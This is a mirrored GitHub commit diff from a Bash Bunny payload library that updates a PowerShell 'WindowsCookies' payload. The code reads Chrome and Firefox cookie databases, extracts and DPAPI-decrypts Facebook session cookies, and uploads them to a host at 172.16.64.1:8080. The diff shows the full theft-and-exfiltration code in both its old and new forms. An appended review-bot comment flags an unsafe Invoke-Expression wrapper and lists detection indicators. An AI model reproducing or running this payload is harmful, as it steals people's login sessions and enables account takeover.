mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Updated WindowsCookie for firmware v1.1 and fix powershell regex for Windows 7 (#161)
242
payloads/library/WindowsCookies/p
Normal file → Executable file
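--- a/payloads/library/WindowsCookies/p
+++ b/payloads/library/WindowsCookies/p
@@ -1,118 +1,124 @@
-# Instructions: import the module, then perform the commanded needed.
-
-# Chrome Facebook cookies extraction
-# Use: Get-FacebookCreds [path to Login Data]
-# Path is optional, use if automatic search doesn't work
-
-function Get-FacebookCreds-Firefox() {
-Param(
-[String]$Path
-)
-
-if ([String]::IsNullOrEmpty($Path)) {
-# $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
-$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
-}
-
-if (![system.io.file]::Exists($Path))
-{
-Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
-Break
-}
-
-Add-Type -AssemblyName System.Security
-# Credit to Matt Graber for his technique on using regular expressions to search for binary data
-$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
-$Encoding = [system.Text.Encoding]::GetEncoding(28591)
-$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
-$BinaryText = $StreamReader.ReadToEnd()
-$StreamReader.Close()
-$Stream.Close()
-
-# First the magic bytes for the facebook string, datr size is 24
-$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
-$PwdMatches = $PwdRegex.Matches($BinaryText)
-$datr = $PwdMatches.groups[1]
-
-# First the magic bytes for the facebook string, c_user size is 15
-$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
-$PwdMatches = $PwdRegex.Matches($BinaryText)
-$c_user = $PwdMatches.groups[1]
-
-# First the magic bytes for the facebook string, xs size is 44
-$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
-$PwdMatches = $PwdRegex.Matches($BinaryText)
-$xs = $PwdMatches.groups[1]
-
-"$env:computername ---> "
-"datr is $datr ###"
-"c_user is $c_user ###"
-"xs is $xs ###"
-}
-
-function Get-FacebookCreds-Chrome() {
-Param(
-[String]$Path
-)
-
-if ([String]::IsNullOrEmpty($Path)) {
-$Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
-}
-
-if (![system.io.file]::Exists($Path))
-{
-Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
-Break
-}
-
-Add-Type -AssemblyName System.Security
-# Credit to Matt Graber for his technique on using regular expressions to search for binary data
-$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
-$Encoding = [system.Text.Encoding]::GetEncoding(28591)
-$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
-$BinaryText = $StreamReader.ReadToEnd()
-$StreamReader.Close()
-$Stream.Close()
-
-# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
-$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
-$PwdMatches = $PwdRegex.Matches($BinaryText)
-
-# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
-$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
-$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
-$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
-
-
-# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
-$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
-$PwdMatches = $PwdRegex.Matches($BinaryText)
-
-# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
-$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
-$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
-$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
-
-
-# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
-$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
-$PwdMatches = $PwdRegex.Matches($BinaryText)
-
-# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
-$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
-$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
-$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
-
-"$env:computername ---> "
-"datr is $datr ###"
-"c_user is $c_user ###"
-"xs is $xs ###"
-}
-
-
-function Payload() {
-
-Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome))
-Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Firefox))
-
-}
+# Instructions: import the module, then perform the commanded needed.
+
+# Chrome Facebook cookies extraction
+# Use: Get-FacebookCreds [path to Login Data]
+# Path is optional, use if automatic search doesn't work
+
+function Get-FacebookCreds-Firefox() {
+Param(
+[String]$Path
+)
+
+if ([String]::IsNullOrEmpty($Path)) {
+# $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
+$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
+}
+
+if (![system.io.file]::Exists($Path))
+{
+Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
+Break
+}
+
+Add-Type -AssemblyName System.Security
+# Credit to Matt Graber for his technique on using regular expressions to search for binary data
+$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
+$Encoding = [system.Text.Encoding]::GetEncoding(28591)
+$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
+$BinaryText = $StreamReader.ReadToEnd()
+$StreamReader.Close()
+$Stream.Close()
+
+# First the magic bytes for the facebook string, datr size is 24
+$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
+$PwdMatches = $PwdRegex.Matches($BinaryText)
+$datr = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+# $datr = $PwdMatches.groups[1]
+
+# First the magic bytes for the facebook string, c_user size is 15
+$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
+$PwdMatches = $PwdRegex.Matches($BinaryText)
+$c_user = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+# $c_user = $PwdMatches.groups[1]
+
+# First the magic bytes for the facebook string, xs size is 44
+$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
+$PwdMatches = $PwdRegex.Matches($BinaryText)
+$xs = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+# $xs = $PwdMatches.groups[1]
+
+"Firefox ---> "
+"datr is $datr ###"
+"c_user is $c_user ###"
+"xs is $xs ###"
+}
+
+function Get-FacebookCreds-Chrome() {
+Param(
+[String]$Path
+)
+
+if ([String]::IsNullOrEmpty($Path)) {
+$Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
+}
+
+if (![system.io.file]::Exists($Path))
+{
+Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
+Break
+}
+
+Add-Type -AssemblyName System.Security
+# Credit to Matt Graber for his technique on using regular expressions to search for binary data
+$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
+$Encoding = [system.Text.Encoding]::GetEncoding(28591)
+$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
+$BinaryText = $StreamReader.ReadToEnd()
+$StreamReader.Close()
+$Stream.Close()
+
+# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
+$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
+$PwdMatches = $PwdRegex.Matches($BinaryText)
+
+# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+
+# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
+$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
+$PwdMatches = $PwdRegex.Matches($BinaryText)
+
+# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+
+# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
+$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
+$PwdMatches = $PwdRegex.Matches($BinaryText)
+
+# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+"Chrome ---> "
+"datr is $datr ###"
+"c_user is $c_user ###"
+"xs is $xs ###"
+}
+
+
+function Payload() {
+
+Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Chrome))
+Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Firefox))
+
+}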
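Review bot: In the new `Payload` function both upload calls are still wrapped in `Invoke-Expression`, so whatever text the endpoint at `172.16.64.1:8080` returns from `UploadString` is evaluated as PowerShell in the logged-in user's session; the commit changes only the URL path and leaves that wrapper in place. Because the request is cleartext HTTP and the responder is not authenticated, the wrapper should be dropped and the return value discarded, i.e. `$null = (New-Object Net.WebClient).UploadString(...)` with the existing arguments. The header comment also still reads `# Use: Get-FacebookCreds [path to Login Data]` although the functions are named `Get-FacebookCreds-Chrome` and `Get-FacebookCreds-Firefox` and read cookie stores, and the Firefox function still reports `'Chrome db file doesnt exist'`. For anyone writing detections from this page, the stable indicators in the new code are the `ProtectedData]::Unprotect` call with `CurrentUser` scope and a non-browser process reading `Cookies` / `cookies.sqlite`; PowerShell script block logging (event 4104) should record the former if it is enabled.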